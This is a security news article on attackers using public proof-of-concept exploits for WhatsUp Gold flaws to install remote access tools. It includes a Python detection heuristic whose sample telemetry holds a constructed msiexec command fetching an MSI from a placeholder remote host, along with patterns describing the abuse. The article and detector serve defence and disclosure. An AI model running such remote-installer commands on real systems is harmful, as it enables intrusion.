Attackers are likely using publicly available proof-of-concept (PoC) exploits for recently discovered security flaws in Progress Software’s WhatsUp Gold to conduct opportunistic attacks.
Activity is said to have started on August 30, 2024, just five hours after the PoC for CVE-2024-6670 (CVSS score: 9.8) was released by security researcher Sina Kheirkhah of the Summoning Team, who is also credited with discovering and reporting CVE-2024-6671 (CVSS score: 9.8).
Both critical vulnerabilities, which allow an unauthenticated attacker to obtain an encrypted user password, were patched by Progress in mid-August 2024.
“The chronology of events suggests that despite the availability of fixes, some organizations failed to apply them quickly, leading to incidents almost immediately after the PoC was published,” Trend Micro researchers Hitomi Kimura and Maria Emreen Viray said in an analysis published Thursday.
Attacks observed by the cybersecurity firm involve bypassing WhatsUp Gold authentication to abuse the Active Monitor PowerShell Script feature, and ultimately loading various remote access tools to gain access to the Windows host.
This includes Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote, with both Atera Agent and Splashtop Remote installed using a single MSI installer file obtained from the remote server.
“The polling process NmPoller.exe, a WhatsUp Gold executable, appears to be capable of hosting a script named Active Monitor PowerShell Script as a legitimate function,” the researchers explained. “The threat actors in this case chose it to run for remote arbitrary code execution.”
Although no further exploitation was detected, the use of multiple remote access programs indicates the involvement of a ransomware actor.
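As an added defensive example (not code from the article or from Trend Micro), the following Python heuristic flags the two behaviours described above in process-creation telemetry: NmPoller.exe launching PowerShell, and msiexec.exe fetching an installer from a remote location. The Sysmon-style field names, the WhatsUp Gold install path and the sample command lines are assumptions.

```python
"""Hunting heuristic for the WhatsUp Gold abuse pattern: NmPoller.exe spawning
PowerShell (the Active Monitor script path) and msiexec.exe pulling an MSI from
a remote URL or UNC path. Field names, paths and command lines are assumptions."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str

POLLER = "nmpoller.exe"
SHELLS = {"powershell.exe", "pwsh.exe"}
# msiexec invoked with an installer located on an http(s) URL or a UNC share
REMOTE_MSI = re.compile(r"msiexec(\.exe)?\s.*(https?://|\\\\)\S+\.msi", re.I)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> Optional[str]:
    """Return a finding label for a suspicious event, else None."""
    if basename(ev.parent_image) == POLLER and basename(ev.image) in SHELLS:
        return "nmpoller-spawned-powershell"
    if basename(ev.image) == "msiexec.exe" and REMOTE_MSI.search(ev.command_line):
        return "msiexec-remote-installer"
    return None

def hunt(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Index and label of every event that matches a heuristic."""
    return [(i, label) for i, ev in enumerate(events) if (label := classify(ev))]

# Constructed sample telemetry (not events from the Trend Micro report).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",  # assumed path
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command <active monitor script>"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i http://REMOTE-HOST-PLACEHOLDER/agent.msi /quiet"),
    ProcEvent(r"C:\Windows\explorer.exe",  # benign admin use, not flagged
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-Service"),
    ProcEvent(r"C:\Windows\System32\svchost.exe",  # local MSI, not flagged
              r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Temp\update.msi /quiet"),
]

if __name__ == "__main__":
    for idx, label in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {label}")
```

The parent-child pairing is the higher-confidence signal; the remote-MSI check on its own will also fire on legitimate software deployment and is better treated as corroborating context.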
This is the second time that security vulnerabilities in WhatsUp Gold have been weaponized. Early last month, the Shadowserver Foundation said it had observed attempts to exploit CVE-2024-4885 (CVSS score: 9.8), another critical bug that Progress resolved in June 2024.
The disclosure comes weeks after Trend Micro also found threat actors exploiting a patched security flaw in Atlassian Confluence Data Center and Confluence Server (CVE-2023-22527, CVSS score: 10.0) to deliver the Godzilla web shell.
“The CVE-2023-22527 vulnerability continues to be widely exploited by a wide range of threat actors who are abusing this vulnerability to perform malicious activities, making it a significant security risk for organizations worldwide,” the company said in a statement.